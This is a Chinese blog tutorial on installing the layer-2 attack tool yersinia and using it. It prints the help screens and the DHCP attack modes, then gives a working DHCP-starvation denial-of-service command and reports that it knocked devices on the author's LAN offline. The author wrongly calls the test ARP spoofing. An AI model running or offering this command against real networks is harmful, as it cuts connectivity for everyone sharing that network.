yersinia 的安装与使用

怎么说，最近才看到这个工具确实我有点丢人了（，网上资料比较少，写一份顺便自己看。
博主配置是Fedora 25，所以就是dnf install yersinia 就完成了安装，不过不知道为什么yersinia基于GTK的图形界面打不开，有点心烦，那就命令行解决得了。
首先你得有个局域网（不然sample没效果），ifconfig查看网卡顺便记住interface。

[root@102 laplacence]# ifconfigenp3s0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500        ether 44:8a:5b:f0:ac:e3  txqueuelen 1000  (Ethernet)        RX packets 0  bytes 0 (0.0 B)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 0  bytes 0 (0.0 B)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0        device interrupt 19  lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10<host>        loop  txqueuelen 1000  (Local Loopback)        RX packets 71  bytes 7207 (7.0 KiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 71  bytes 7207 (7.0 KiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0virbr0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255        ether 52:54:00:8d:e3:86  txqueuelen 1000  (Ethernet)        RX packets 0  bytes 0 (0.0 B)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 0  bytes 0 (0.0 B)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0wlp5s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 192.168.3.104  netmask 255.255.255.0  broadcast 192.168.3.255        inet6 fe80::e4a:c8f:aed6:53bf  prefixlen 64  scopeid 0x20<link>        ether f0:42:1c:e1:2c:56  txqueuelen 1000  (Ethernet)        RX packets 77859  bytes 97739807 (93.2 MiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 1006468  bytes 299830684 (285.9 MiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

博主现在是wlp5s0在用网络，就默默记下了这个interface 后面会用到的。

[root@102 laplacence]# yersinia -hUsage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]       -V   Program version.       -h   This help screen.       -G   Graphical mode (GTK).       -I   Interactive mode (ncurses).       -D   Daemon mode.       -d   Debug.       -l logfile   Select logfile.       -c conffile  Select config file.  protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.Try 'yersinia protocol -h' to see protocol_options helpPlease, see the man page for a full list of options and many examples.Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>MOTD: Who dares wins

umm，很有*nix风的一个help（（。
测试一个arp欺骗好了。根据help写上protocol

[root@102 laplacence]# yersinia dhcp -hUsage: yersinia dhcp [-h -M] [-attack id] [-source arg] [-dest arg] [-ipsource arg] [-ipdest arg] [-sport arg] [-dport arg] [-opcode arg] [-htype arg] [-hlen arg] [-hops arg] [-xid arg] [-secs arg] [-flags arg] [-ci arg] [-yi arg] [-si arg] [-gi arg] [-ch arg] [-interface arg]            -h    This help screen.           -M    Disable MAC address spoofing.Use '?' as parameter argument if you would like to display the parameter help.Please, see the man page for a full list of options and many examples.Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>MOTD: Do you have an ISL capable Cisco switch? Share it!! ;)

然后是-attack和其参数，

[root@102 laplacence]# yersinia dhcp -attack ?    <0>    NONDOS attack sending RAW packet    <1>    DOS attack sending DISCOVER packet    <2>    NONDOS attack creating DHCP rogue server    <3>    DOS attack sending RELEASE packetMOTD: Ghosts'n'Goblins, Trojan, Out Run, Bump'n'jump, Side Arms...

这里用1就行，反正是个sample嘛（（。

[root@102 laplacence]# yersinia dhcp -attack 1 -interface wlp5s0<*> Starting DOS attack sending DISCOVER packet...<*> Press any key to stop the attack <*>

因为router只能通过upnp来控制，所以攻击开始后根本进不去。。只能靠现象来看结果，结果是，两台手机都掉线，攻击5s后（这个router的dhcp池只有99个）就连攻击机本机都掉线了，有线（大概是static）貌似不受影响。